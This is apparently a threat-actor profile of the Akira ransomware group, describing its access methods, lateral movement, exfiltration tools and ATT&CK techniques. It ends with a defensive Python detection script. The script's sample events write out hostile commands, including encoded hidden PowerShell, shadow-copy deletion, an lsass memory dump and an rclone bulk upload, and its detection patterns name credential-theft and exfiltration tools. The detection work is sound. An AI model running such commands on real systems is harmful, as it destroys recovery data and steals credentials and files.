
Akira (Ransomware Group) – Threat Actor

January 28, 2025
in Threat Actors

Akira Group

Additional Names

Storm-1567, GOLD SAHARA, PUNK SPIDER

Date of Initial Activity

2023

Location

Unknown

Suspected Attribution

Ransomware Group

Motivation

Financial Gain

Software

Servers

Overview

The Akira Group has emerged as a notable player in the ransomware landscape since its operations began in March 2023. Recognizable by the retro aesthetic of its data leak site, the group quickly gained attention for its aggressive approach to cyber extortion. Using multi-extortion tactics, Akira not only encrypts victims’ data but also threatens to publish sensitive information on its Tor-based leak site if ransom demands are not met, a layered approach that intensifies the pressure on victims and often leads to significant financial losses. The group targets a diverse range of sectors, including education, finance, manufacturing, real estate, and healthcare, and shows little selectivity beyond a preference for large enterprises, gaining initial access by exploiting vulnerabilities in public-facing applications and services. This indiscriminate targeting has raised alarms across industries as organizations work to strengthen their defenses against the evolving threat. Technically, Akira infiltrates systems by exploiting weaknesses in multi-factor authentication (MFA) and known vulnerabilities in Virtual Private Network (VPN) software. Once inside, the operators move laterally within the network, dumping credentials and escalating privileges as needed. The group is known for its use of PowerShell commands to execute the ransomware payload, delete volume shadow copies, and encrypt files, while employing evasion tactics to avoid detection.

Common Targets

  • Information
  • Retail Trade
  • Finance and Insurance
  • Educational Services
  • Health Care and Social Assistance

Attack vectors

Software Vulnerabilities

How they work

Initial Access

The initial foothold on the system is obtained via several methods. Exploitation of multi-factor authentication (MFA) weaknesses (e.g. CVE-2023-20269) is the method most often seen in observed campaigns, along with known vulnerabilities in public-facing services such as RDP. Spear phishing is also used to gain a foothold; it is generally more effective than plain phishing because it is addressed to a specific user or user group and/or built around a theme relevant to the recipients.

Escalation and Lateral Movement

To escalate privileges and/or move laterally, LSASS dumps are used. Additionally, or alternatively, RDP is used to connect to other machines within the network while moving laterally. Other tools used are PCHunter64, LaZagne, and Mimikatz.

Data Collection and Exfiltration

Once inside the environment, the actors exfiltrate data before encrypting it. This allows the victim to be extorted twice: once to recover the encrypted files, and once to keep the stolen data from being published on the Akira extortion blog. To upload the gathered files, RClone, WinSCP, and FileZilla have been observed in use.

MITRE ATT&CK Techniques

  • T1003.001 OS Credential Dumping: LSASS Memory
  • T1048 Exfiltration Over Alternative Protocol
  • T1021.001 Remote Services: Remote Desktop Protocol
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1106 Native API
  • T1190 Exploit Public-Facing Application
  • T1486 Data Encrypted for Impact
  • T1490 Inhibit System Recovery
  • T1566 Phishing
  • T1584 Compromise Infrastructure
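The tradecraft described under "How they work" leaves a characteristic trail in process-creation telemetry: a hidden or encoded PowerShell launch, shadow copy deletion, a tool touching LSASS, an RDP client session, and a bulk-upload utility such as RClone. The script below is an added detection example written for this page; it is not CyberMaterial's code and not an Akira tool. It assumes a simplified key=value log line format (a stand-in for Sysmon Event ID 1 or Windows 4688 records), the sample events are constructed, and the regular expressions are illustrative patterns, not a complete rule set. The point it makes is that any single hit is noisy, but several of these techniques appearing under one user account in a short window is the precursor chain a defender should page on.

```python
"""Map process-creation events to the ATT&CK techniques attributed to Akira.

Added example, not CyberMaterial's code. The log format, the sample events and
the detection patterns are assumptions made for illustration.
"""
import re
from dataclasses import dataclass
from collections import defaultdict

# Constructed sample events (not real telemetry): one process launch per line.
SAMPLE_EVENTS = [
    'ts=2025-01-28T10:01:03Z user=CORP\\jdoe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmd="powershell.exe -nop -w hidden -enc SQBFAFgA..."',
    'ts=2025-01-28T10:02:11Z user=CORP\\jdoe image=C:\\Windows\\System32\\vssadmin.exe '
    'cmd="vssadmin.exe delete shadows /all /quiet"',
    'ts=2025-01-28T10:04:45Z user=CORP\\jdoe image=C:\\Tools\\procdump64.exe '
    'cmd="procdump64.exe -ma lsass.exe lsass.dmp"',
    'ts=2025-01-28T10:09:30Z user=CORP\\jdoe image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe '
    'cmd="rclone.exe copy D:\\Finance remote:share --transfers 16"',
    'ts=2025-01-28T10:12:02Z user=CORP\\jdoe image=C:\\Windows\\System32\\mstsc.exe '
    'cmd="mstsc.exe /v:fileserver01"',
    'ts=2025-01-28T10:15:40Z user=CORP\\asmith image=C:\\Windows\\System32\\notepad.exe '
    'cmd="notepad.exe C:\\Users\\asmith\\notes.txt"',
]

# Detection rules: (technique id from the page's ATT&CK list, description, pattern on the command line).
RULES = [
    ("T1490", "Inhibit System Recovery: volume shadow copy deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy", re.I)),
    ("T1003.001", "OS Credential Dumping: process referencing LSASS",
     re.compile(r"\blsass(\.exe)?\b", re.I)),
    ("T1059.001", "Command and Scripting Interpreter: hidden or encoded PowerShell",
     re.compile(r"powershell.*(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)", re.I)),
    ("T1048", "Exfiltration Over Alternative Protocol: bulk-upload tooling",
     re.compile(r"\b(rclone|winscp|filezilla)(\.exe)?\b", re.I)),
    ("T1021.001", "Remote Services: RDP client launched",
     re.compile(r"\bmstsc(\.exe)?\b", re.I)),
]

# key=value pairs; a value is either a double-quoted string or a run of non-whitespace.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn one key=value log line into a dict of fields."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


@dataclass
class Finding:
    technique: str
    description: str
    user: str
    cmd: str


def triage(lines):
    """Return one Finding per (event, matching rule) pair."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        cmd = ev.get("cmd", "")
        for tid, desc, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(tid, desc, ev.get("user", "?"), cmd))
    return findings


def technique_ids(lines):
    """Sorted list of distinct technique ids observed across all events."""
    return sorted({f.technique for f in triage(lines)})


def techniques_by_user(lines):
    """Group observed technique ids per user account."""
    per_user = defaultdict(set)
    for f in triage(lines):
        per_user[f.user].add(f.technique)
    return dict(per_user)


def high_confidence_users(lines, min_techniques=3):
    """Accounts showing at least min_techniques distinct techniques: the chain, not a single hit."""
    return sorted(u for u, t in techniques_by_user(lines).items() if len(t) >= min_techniques)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.technique:10} {f.user:12} {f.description}")
    print("escalate for:", high_confidence_users(SAMPLE_EVENTS))
```

Run stand-alone, the script lists five findings for CORP\jdoe and none for CORP\asmith, and the chain check escalates only the first account. In practice the rules would be backed by a proper Sigma ruleset and the grouping keyed by host and session as well as user, but the shape is the same: correlate across the techniques in the list above rather than alerting on each in isolation.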